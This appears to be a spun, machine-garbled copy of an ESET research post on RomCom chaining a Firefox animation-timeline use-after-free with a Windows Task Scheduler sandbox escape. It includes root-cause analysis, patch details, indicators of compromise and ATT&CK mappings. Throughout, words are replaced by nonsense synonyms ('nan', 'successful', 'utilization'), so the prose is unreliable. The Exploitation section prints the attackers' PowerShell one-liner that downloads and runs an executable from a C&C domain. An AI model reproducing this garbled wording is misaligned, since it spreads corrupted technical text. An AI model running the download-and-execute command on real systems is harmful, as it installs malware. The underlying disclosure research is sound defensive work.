Romcom Exploits Firefox And Windows Zero Days In The Wild

ESET researchers discovered a antecedently chartless vulnerability successful Mozilla products, exploited successful nan chaotic by Russia-aligned group RomCom. This is astatine slightest nan 2nd clip that RomCom has been caught exploiting a important zero-day vulnerability successful nan wild, aft nan maltreatment of CVE-2023-36884 via Microsoft Word successful June 2023.

This captious vulnerability, assigned CVE-2024-9680 pinch a CVSS people of 9.8, allows susceptible versions of Firefox, Thunderbird, and nan Tor Browser to execute codification successful nan restricted discourse of nan browser. Chained pinch different antecedently chartless vulnerability successful Windows, assigned CVE-2024-49039 pinch a CVSS people of 8.8, arbitrary codification tin beryllium executed successful nan discourse of nan logged-in user. In a successful attack, if a unfortunate browses to a web page containing nan exploit, an adversary tin tally arbitrary codification – without immoderate personification relationship required – which successful this lawsuit led to nan installation of RomCom’s eponymous backdoor connected nan victim’s computer.

Key points of this blogpost:

• On October 8th, 2024, ESET researchers discovered a antecedently chartless zero-day vulnerability successful Mozilla products being exploited successful nan wild.
• Analysis of nan utilization led to nan find of nan vulnerability, now assigned CVE-2024-9680: a use-after-free bug successful nan animation timeline characteristic successful Firefox. Mozilla patched nan vulnerability connected October 9th, 2024.
• Further study revealed different zero-day vulnerability successful Windows: a privilege escalation bug, now assigned CVE‑2024‑49039, that allows codification to tally extracurricular of Firefox’s sandbox. Microsoft released a spot for this 2nd vulnerability connected November 12th, 2024.
• Successful exploitation attempts delivered nan RomCom backdoor, successful what looks for illustration a wide campaign.

RomCom profile

RomCom (also known arsenic Storm-0978, Tropical Scorpius, aliases UNC2596) is simply a Russia-aligned group that conducts some opportunistic campaigns against selected business verticals and targeted espionage operations. The group’s attraction has shifted to see espionage operations collecting intelligence, successful parallel pinch its much accepted cybercrime operations. The backdoor utilized by nan group is tin of executing commands and downloading further modules to nan victim’s machine.

Table 1 shows nan sectors targeted, according to our research, by RomCom successful 2024. This highlights that nan group is engaged successful espionage but besides cybercrime operations.

Table 1. RomCom victims successful 2024

Vertical and region	Purpose	First seen
Governmental entity successful Ukraine	Espionage	2024-01
Pharmaceutical assemblage successful nan US	Cybercrime	2024-03
Legal assemblage successful Germany	Cybercrime	2024-03
Insurance assemblage successful nan US	Cybercrime	2024-04
Defense assemblage successful Ukraine	Espionage	2024-08
Energy assemblage successful Ukraine	Espionage	2024-08
Governmental entities successful Europe	Espionage	2024-08
Worldwide targeting – Firefox exploit	Unknown	2024-10

Compromise chain

The discuss concatenation is composed of a clone website that redirects nan imaginable unfortunate to nan server hosting nan exploit, and should nan utilization succeed, shellcode is executed that downloads and executes nan RomCom backdoor – an illustration of which is depicted successful Figure 1. While we don’t cognize really nan nexus to nan clone website is distributed, however, if nan page is reached utilizing a susceptible browser, a payload is dropped and executed connected nan victim’s machine pinch nary personification relationship required. Finally, a JavaScript redirection is performed utilizing window.location.href aft a fewer seconds, giving nan utilization clip to run.

Figure 1. Exploit concatenation to discuss nan victim

From October 10th, 2024 to October 16th, 2024, conscionable aft nan first vulnerability was patched, we recovered different C&C servers hosting nan exploit. They utilized a recurring naming strategy for their clone servers by adding nan prefix aliases suffix redir aliases red to a morganatic domain, sometimes besides changing its top-level domain (TLD), arsenic shown successful Table 2. The redirection astatine nan extremity of nan exploitation effort took nan victims to nan morganatic website astatine nan original domain name, presumably to debar raising nan targets’ suspicions.

Table 2. Fake servers redirecting to nan exploit

First seen	Fake server	Final redirect to	Redirect website purpose
2024⁠-⁠10⁠-⁠10	redircorrectiv[.]com	correctiv.org	Nonprofit independent newsroom.
2024⁠-⁠10⁠-⁠14	devolredir[.]com	devolutions.net	Remote entree and password guidance solutions.
2024⁠-⁠10⁠-⁠15	redirconnectwise[.]cloud	connectwise.com	MSP exertion and IT guidance software.
2024⁠-⁠10⁠-⁠16	redjournal[.]cloud	connectwise.com

If a unfortunate utilizing a susceptible browser visits a web page serving this exploit, nan vulnerability is triggered and shellcode is executed successful a content process. The shellcode is composed of 2 parts: nan first retrieves nan 2nd from representation and marks nan containing pages arsenic executable, while nan 2nd implements a PE loader based connected nan open-source task Shellcode Reflective DLL Injection (RDI).

The loaded room implements a sandbox flight for Firefox that leads to downloading and executing nan RomCom backdoor connected nan victim’s computer. The backdoor is staged astatine a C&C server located astatine journalctd[.]live, correctiv[.]sbs, aliases cwise[.]store, depending connected nan sample.

According to our telemetry, from October 10th, 2024 to November 4th, 2024, imaginable victims who visited websites hosting nan utilization were located mostly successful Europe and North America, arsenic shown successful Figure 2. The number of imaginable targets runs from a azygous unfortunate per state to arsenic galore arsenic 250, according to ESET telemetry.

Figure 2. Heatmap of imaginable victims

CVE-2024-9680: Use-after-free successful Firefox animation timeline

On October 8th, 2024, we recovered absorbing files utilized to present nan RomCom backdoor, hosted connected nan server 1drv.us[.]com controlled by nan threat actor. The exploits target a use-after-free vulnerability successful Firefox animation timelines, allowing an attacker to execute codification execution successful a contented process. During our investigation, we analyzed nan files referenced successful Table 3.

Table 3. Files related to nan exploit

Name	Description
main-128.js	JavaScript record containing nan utilization for versions of Firefox from 106 to 128.
main-129.js	JavaScript record containing nan utilization for versions of Firefox from 129 to 131.
main-tor.js	JavaScript record containing nan utilization for Tor Browser versions 12 and 13.
script.js	JavaScript record utilized to make a CAPTCHA.
utils.js	JavaScript record containing helper functions, e.g., to person information types, aliases to get nan OS type aliases browser version.
animation0.html	HTML iframe loaded by nan utilization to trigger nan use-after-free vulnerability.
index.html	HTML page loading nan utilization and redirecting to a morganatic website aft a fewer seconds.

Timestamps related to these files bespeak that they were created connected October 3rd, 2024 and made disposable online; nevertheless, nan threat character mightiness person been successful possession of this utilization earlier than this.

We reported nan vulnerability to Mozilla soon aft discovery, pinch nan pursuing timeline of events:

• 2024-10-08: Discovery and first analysis.
• 2024-10-08: Vulnerability reported to Mozilla.
• 2024-10-08: Vulnerability acknowledged by Mozilla.
• 2024-10-09: CVE-2024-9680 assigned by Mozilla Corporation.
• 2024-10-09: Vulnerability patched successful Firefox, Security Advisory 2024-51.
• 2024-10-09: Vulnerability patched successful Tor Browser pinch release 13.5.7.
• 2024-10-10: Vulnerability patched successful Tails pinch release 6.8.1.
• 2024-10-10: Vulnerability patched successful Thunderbird, Security Advisory 2024-52.

We would for illustration to convey nan squad astatine Mozilla for being very responsive and item their awesome activity to merchandise a spot wrong a day.

Mozilla and nan Tor Project released a spot that fixes nan vulnerability successful nan pursuing versions:

• Firefox 131.0.2
• Firefox ESR 115.16.1
• Firefox ESR 128.3.1
• Tor Browser 13.5.7
• Tails 6.8.1
• Thunderbird 115.16
• Thunderbird 128.3.1
• Thunderbird 131.0.1

During nan mentation of this blogpost, independent interrogator Dimitri Fourny released a detailed analysis of nan vulnerability connected November 14th, 2024.

Root origin analysis

The main-<Firefox version>.js first checks nan nonstop type of nan browser, and determines its exploitability by checking immoderate circumstantial objects’ offsets and sizes for an affected version. If these checks pass, it proceeds to adhd an HTML iframe into nan utilization page, implemented successful animation0.html. The second creates 4 HTML div elements identified respectively arsenic target0 to target3, but astir importantly it defines a getter usability for nan Object.prototype’s then spot arsenic shown successful Figure 3. This usability will trigger nan use-after-free vulnerability arsenic explained below. Note that nan comments (in acheronian green) are from nan utilization authors; this could bespeak that nan utilization was still successful a developmental shape aliases that nan threat character bought it.

Figure 3. The JavaScript utilization defines nan then property’s getter usability connected each object, triggering a use-after-free vulnerability

After immoderate first heap spraying, nan prepare usability creates 4 Animation objects, 1 for each div constituent antecedently created, arsenic illustrated successful Figure 4. These animation objects are handled by an AnimationTimeline object.

Figure 4. The utilization codification creates animation objects for div elements

During nan archive animation timeline, nan test usability is called, which pauses and gets nan ready spot of nan first and 2nd animation objects. As stated successful nan documentation, nan ready spot returns a Promise that resolves erstwhile nan animation is fresh to beryllium played. Calling nan then method connected nan committedness causes nan getter usability shown successful Figure 3 to beryllium called. Essentially, this usability increments a world emblem adaptable and erstwhile it reaches 2, nan first animation entity (anim0) is cancelled, and each nan div elements are removed. The telephone to nan rm0 usability (shown successful Figure 3) sets nan animation objects to null successful bid to free them, which triggers nan use-after-free vulnerability. This usability besides does immoderate heap feng shui and, successful nan initially discovered exploit, calls nan getInfo usability responsible for achieving codification execution.

In nan meantime, arsenic nan animation0.html archive is being refreshed, nan Tick method of its AnimationTimeline entity is called periodically. As seen successful Figure 5, this method iterates complete nan different animation objects coming successful nan animation timeline and appends animations to beryllium removed to a section array adaptable called animationsToRemove.

Figure 5. In AnimationTimeline::Tick, animation objects to beryllium removed are appended to section array adaptable animationsToRemove

The bug lies successful that, while iterating complete nan different animation objects of nan animation timeline, nan Tick method of nan Animation entity is called, which tin lead to nan freeing of nan existent animation object, resulting successful handling a dangling pointer. While debugging nan exploit, we observed a series of calls that yet ended up successful nan getter usability explained above, arsenic illustrated successful Figure 6 and Figure 7.

Figure 6. Call stack of nan animation being cancelled by nan getter usability called via nan Animation::Tick method Figure 7. The Animation::PauseAt method ends up calling nan getter function

The getter usability calls Animation::Cancel which successful move calls AnimationTimeline::RemoveAnimation. Then, nan animation objects anim0 and anim1 are group to null successful bid for them to get freed. When AnimationTimeline::Tick past iterates complete nan array animationsToRemove (line 74 successful Figure 5), AnimationTimeline::RemoveAnimation will manipulate a dangling pointer of an Animation entity that was already removed, arsenic shown successful Figure 8.

Figure 8. Call stack of nan clang successful AnimationTimeline::RemoveAnimation while manipulating a dangling pointer

After freeing nan animations successful nan rm0 function, nan utilization proceeds pinch much heap guidance successful bid to power nan objects that will switch nan freed animations, and finally, nan getInfo usability is called, arsenic seen successful Figure 9.

Figure 9. Exploit codification usability rm0 triggers nan use-after-free bug and exploits it

Without going into excessively overmuch item astir nan utilization code, its writer abused div objects and their attributes arsenic good arsenic ImageData objects to leak properties of nan latter, arsenic observed successful Figure 10.

Figure 10. Exploit codification getInfo usability attempts to leak an ImageData object

Then, nan utilization codification proceeds to manipulate ArrayBuffer objects truthful arsenic to leak nan reside of an arbitrary JavaScript entity (known arsenic an addrof primitive) and maltreatment nan Firefox JIT compiler to execute nan first shellcode constituent successful nan discourse of a contented process, arsenic illustrated successful Figure 11. This method is explained successful awesome item successful this blogpost.

Figure 11. The utilization codification abuses nan Firefox JIT compiler to execute shellcode

Mozilla patched nan vulnerability successful Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1 connected October 9th, 2024. Essentially, nan pointers to nan animation objects handled by nan timeline are now implemented done reference-counting pointers (RefPtr), arsenic suggested by nan diff, which prevents nan animations from being freed, since AnimationTimeline::Tick will still clasp a reference to them.

Shellcode analysis

Both shellcodes are stored successful nan JavaScript utilization record main-<Firefox version>.js. The first 1 is dynamically created arsenic an array of float numbers while nan 2nd 1 is stored arsenic a immense array of bytes.

Egghunting shellcode

This first shellcode simply retrieves nan 2nd shellcode by searching successful representation for a hardcoded magic worth of 0x8877665544332211, changes its representation protection to read-write-execute (RWX), and executes nan codification located astatine this address.

Reflective loader shellcode

This 2nd shellcode is nan compiled type of nan Shellcode RDI project, which enables a DLL to beryllium loaded. The constants utilized successful nan shellcode were not changed by nan threat character (see https://github.com/monoxgas/sRDI/blob/master/Native/Loader.cpp#L367 vs. nan constants shown successful Figure 12).

Figure 12. The constants utilized successful nan nationalist Shellcode RDI task remained unchanged

The shellcode simply loads an embedded room whose sole intent is to flight nan restrictions of Firefox’s sandboxed contented process.

CVE-2024-49039: Privilege escalation successful Windows Task Scheduler

The loaded room (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6), named PocLowIL by its developers and compiled connected October 3rd, 2024, implements a sandbox flight from nan untrusted process level of nan contented process to a mean level. Essentially, nan room makes usage of an undocumented RPC endpoint, which should not person been callable from an untrusted process level, to motorboat a hidden PowerShell process that downloads a 2nd shape from a C&C server.

The timeline of nan vulnerability disclosure is nan following:

• 2024-10-08: As portion of our first study to Mozilla for CVE-2024-9680, we besides provided what we believed to beryllium a sandbox escape.
• 2024-10-14: Mozilla’s information squad confirmed nan sandbox flight and deemed nan vulnerability to beryllium tied to a Windows information flaw. They advised america that they had contacted nan Microsoft Security Response Center (MSRC) to measure nan vulnerability.
• 2024-11-12: Microsoft released an advisory for CVE-2024-49039 and its corresponding spot done nan update KB5046612. The vulnerability was besides independently recovered by Vlad Stolyarov and Bahare Sabouri of Google’s Threat Analysis Group, arsenic mentioned successful KB5046612.

Root origin analysis

The sandbox flight codification resides successful nan comparatively mini main usability of nan library. It makes usage of an undocumented RPC endpoint, arsenic illustrated successful Figure 13.

Figure 13. The PocLowIL library prepares to interact pinch a task-related endpoint

The usability proceeds to populate undocumented structures and calls NdrClientCall2 3 times. The first parameter passed to this function, pStubDescriptor, is simply a MIDL_STUB_DESC building whose RpcInterfaceInformation personnel points to an interface identified by nan GUID 33D84484-3626-47EE-8C6F-E7E98B113BE1. This interface is implemented successful nan Windows room WPTaskScheduler.dll, loaded by schedsvc.dll, hosted successful nan process of nan task scheduler work (svchost.exe).

According to our study of this interface, nan sandbox flight codification calls nan pursuing functions:

• s_TaskSchedulerCreateSchedule
• s_TaskSchedulerExecuteSchedule
• s_TaskSchedulerDeleteSchedule (used only for cleanup)

Using RpcView and aft partially reversing immoderate structures, we figured retired nan main structures, arsenic illustrated successful Figure 14.

Figure 14. The main structures utilized to create a scheduled task done nan RPC interface

After applying these structures successful IDA Pro, we obtained a clearer overview of nan task, arsenic seen successful Figure 15.

Figure 15. IDA Pro pseudocode position of nan sandbox flight code

Based connected nan code, nan malicious room creates a scheduled task that will tally an arbitrary exertion astatine mean integrity level, allowing nan attackers to elevate their privileges connected nan strategy and break retired of nan sandbox. This is imaginable owed to nan deficiency of restrictions imposed connected nan security descriptor applied to nan RPC interface during its creation, arsenic illustrated successful Figure 16.

Figure 16. Permissive information descriptor applied to nan RPC interface

The renamed adaptable interface_security_descriptor, utilized erstwhile RpcServerRegisterIf3 is called, has nan pursuing value: D:P(A;;GA;;;S-1-15-2-1)(A;;GA;;;WD). According to nan Security Descriptor Definition Language (SDDL), it allows everyone (WD) to pass pinch nan RPC interface and telephone its procedures sloppy of their integrity level.

Exploitation

In this case, nan threat character created a task named firefox.exe that will motorboat conhost.exe successful headless mode successful bid to hide nan kid process window. The deobfuscation of nan remainder of nan bid statement (shown successful Figure 15) revealed nan PowerShell codification seen successful Figure 17.

$a=$env:public + '\\public'; Invoke-WebRequest https://journalctd[.]live/JfWb4OrQPLh -o $a; sleep 15; Rename-Item $a ($a = ($a + '.exe')) # $env:public\public.exe Start-Process $a; sleep 10; Rename-Item $a ($a = ($a -replace 'public.e', 'epublic.e')) # $env:public\epublic.exe Start-Process $a

Figure 17. PowerShell codification downloading a next-stage component

An executable is downloaded from https://journalctd[.]live/JfWb4OrQPLh, stored successful nan %PUBLIC% files arsenic public.exe, and run. After 10 seconds, it is renamed arsenic epublic.exe and tally again.

Brief spot analysis

The patched type of WPTaskScheduler.dll (version 10.0.19041.5129) released pinch KB5046612 makes usage of a much analyzable information descriptor, arsenic shown successful Figure 18.

Figure 18. The information descriptor introduced by nan spot is much restrictive

The caller information descriptor is:

D:(A;;GRGWGX;;;SY)(A;;GRGWGX;;;LS)(A;;GR;;;NS)(A;;GR;;;IU)S:(ML;;NWNXNR;;;ME)

Breaking down nan drawstring reveals nan pursuing regularisation logic:

• the strategy (SY) and section work (LS) accounts are granted read, write, and execute access,
• the web work (NS) relationship and interactive users (IU) are granted only publication access,
• lastly, objects beneath mean level (ME) integrity are denied read, write, and execute access.

The caller restrictions imposed by nan updated information descriptor forestall nan privilege escalation and render nan sandbox flight codification obsolete.

Conclusion

Chaining together 2 zero-day vulnerabilities equipped RomCom pinch an utilization that requires nary personification interaction. This level of sophistication shows nan threat actor’s will and intends to get aliases create stealthy capabilities. ESET shared elaborate findings pinch Mozilla, pursuing our coordinated vulnerability disclosure process soon aft discovery. Mozilla released a blogpost astir really they reacted to nan disclosure and were capable to merchandise a hole wrong 25 hours, which is very awesome successful comparison to manufacture standards.

For immoderate inquiries astir our investigation published connected WeLiveSecurity, please interaction america astatine threatintel@eset.com. 

ESET Research offers backstage APT intelligence reports and information feeds. For immoderate inquiries astir this service, sojourn nan ESET Threat Intelligence page.

IoCs

A broad database of indicators of discuss and samples tin beryllium recovered successful our GitHub repository.

Files

SHA-1	Filename	Detection	Description
A4AAD0E2AC1EE0C8DD25968FA4631805689757B6	utils.js	JS/Exploit.Agent.NSF	RomCom Firefox exploit.
CA6F8966A3B2640F49B19434BA8C21832E77A031	main-tor.js	JS/Exploit.Agent.NSE	RomCom Firefox exploit.
21918CFD17B378EB4152910F1246D2446F9B5B11	main-128.js	JS/Exploit.Agent.NSE	RomCom Firefox exploit.
703A25F053E356EB6ECE4D16A048344C55DC89FD	main-129.js	JS/Exploit.Agent.NSE	RomCom Firefox exploit.
ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6	PocLowIL.dll	Win64/Runner.AD	RomCom Firefox sandbox escape.
A9D445B77F6F4E90C29E385264D4B1B95947ADD5	PocLowIL.dll	Win64/Runner.AD	RomCom Tor browser sandbox escape.

Network

IP	Domain	Hosting provider	First seen	Details
194.87.189[.]171	journalctd[.]live	Aeza International LTD	2024⁠-⁠10⁠-⁠08	RomCom second-stage C&C server.
178.236.246[.]241	correctiv[.]sbs	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠09	RomCom second-stage C&C server.
62.60.238[.]81	cwise[.]store	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠15	RomCom second-stage C&C server.
147.45.78[.]102	redircorrectiv[.]com	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠10	RomCom utilization transportation C&C server.
46.226.163[.]67	devolredir[.]com	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠14	RomCom utilization transportation C&C server.
62.60.237[.]116	redirconnectwise[.]cloud	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠15	RomCom utilization transportation C&C server.
62.60.237[.]38	redjournal[.]cloud	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠16	RomCom utilization transportation C&C server.
194.87.189[.]19	1drv.us[.]com	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠08	RomCom malware transportation C&C server.
45.138.74[.]238	economistjournal[.]cloud	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠16	RomCom utilization redirection C&C server.
176.124.206[.]88	N/A	AEZA INTERNATIONAL LTD	2024⁠-⁠10⁠-⁠08	RomCom second-stage C&C server.

MITRE ATT&CK techniques

This array was built utilizing version 16 of nan MITRE ATT&CK framework.

Tactic	ID	Name	Description
Resource Development	T1583	Acquire Infrastructure	RomCom sets up VPSes and buys domain names.
	T1587.001	Develop Capabilities: Malware	RomCom develops malware successful aggregate programming languages.
	T1587.004	Develop Capabilities: Exploits	RomCom whitethorn create exploits utilized for first compromise.
	T1588.003	Obtain Capabilities: Code Signing Certificates	RomCom obtains valid code-signing certificates to motion its malware.
	T1588.005	Obtain Capabilities: Exploits	RomCom whitethorn get exploits utilized for first compromise.
	T1588.006	Obtain Capabilities: Vulnerabilities	RomCom whitethorn get accusation astir vulnerabilities it uses for targeting victims.
	T1608	Stage Capabilities	RomCom stages malware connected aggregate transportation servers.
Initial Access	T1189	Drive-by Compromise	RomCom compromises victims done a personification visiting a website hosting an exploit.
Execution	T1053.005	Scheduled Task/Job: Scheduled Task	RomCom creates a scheduled task utilizing RCP to execute nan adjacent shape downloader.
Persistence	T1546.015	Event Triggered Execution: Component Object Model Hijacking	The RomCom backdoor hijacks DLLs loaded by explorer.exe aliases wordpad.exe for persistence.
Privilege Escalation	T1068	Exploitation for Privilege Escalation	RomCom exploits a vulnerability to flight nan Firefox sandbox.
Defense Evasion	T1622	Debugger Evasion	The RomCom backdoor detects debuggers by registering an objection handler.
	T1480	Execution Guardrails	The RomCom backdoor checks whether nan strategy authorities is suitable for execution.
	T1027.011	Obfuscated Files aliases Information: Fileless Storage	The RomCom backdoor is stored encrypted successful nan registry.
	T1553.002	Subvert Trust Controls: Code Signing	The RomCom backdoor weakens information mechanisms by utilizing trusted code-signing certificates.
Credential Access	T1555.003	Credentials from Password Stores: Credentials from Web Browsers	The RomCom backdoor collects passwords, cookies, and sessions utilizing a browser stealer module.
	T1552.001	Unsecured Credentials: Credentials In Files	The RomCom backdoor collects passwords utilizing a record reconnaissance module.
Discovery	T1087	Account Discovery	The RomCom backdoor collects username, computer, and domain data.
	T1518	Software Discovery	The RomCom backdoor collects accusation astir installed package and versions.
	T1614	System Location Discovery	The RomCom backdoor checks for a circumstantial keyboard layout ID (KLID).
Lateral Movement	T1021	Remote Services	The RomCom backdoor creates SSH tunnels to move laterally wrong compromised networks.
Collection	T1560	Archive Collected Data	The RomCom backdoor stores information successful a ZIP archive for exfiltration.
	T1185	Man successful nan Browser	The RomCom backdoor steals browser cookies, history, and saved passwords.
	T1005	Data from Local System	The RomCom backdoor collects circumstantial record types based connected record extensions.
	T1114.001	Email Collection: Local Email Collection	The RomCom backdoor collects files pinch .msg, .eml, and .email extensions.
	T1113	Screen Capture	The RomCom backdoor takes screenshots of nan victim’s computer.
Command and Control	T1071.001	Standard Application Layer Protocol: Web Protocols	The RomCom backdoor uses HTTP aliases HTTPS arsenic a C&C protocol.
	T1573.002	Encrypted Channel: Asymmetric Cryptography	The RomCom backdoor encrypts connection utilizing SSL certificates.
Exfiltration	T1041	Exfiltration Over Command-and-Control Channel	The RomCom backdoor exfiltrates information utilizing nan HTTPS C&C channel.
Impact	T1565	Data Manipulation	RomCom manipulates systems and steals data.
	T1657	Financial Theft	RomCom compromises companies for financial interest.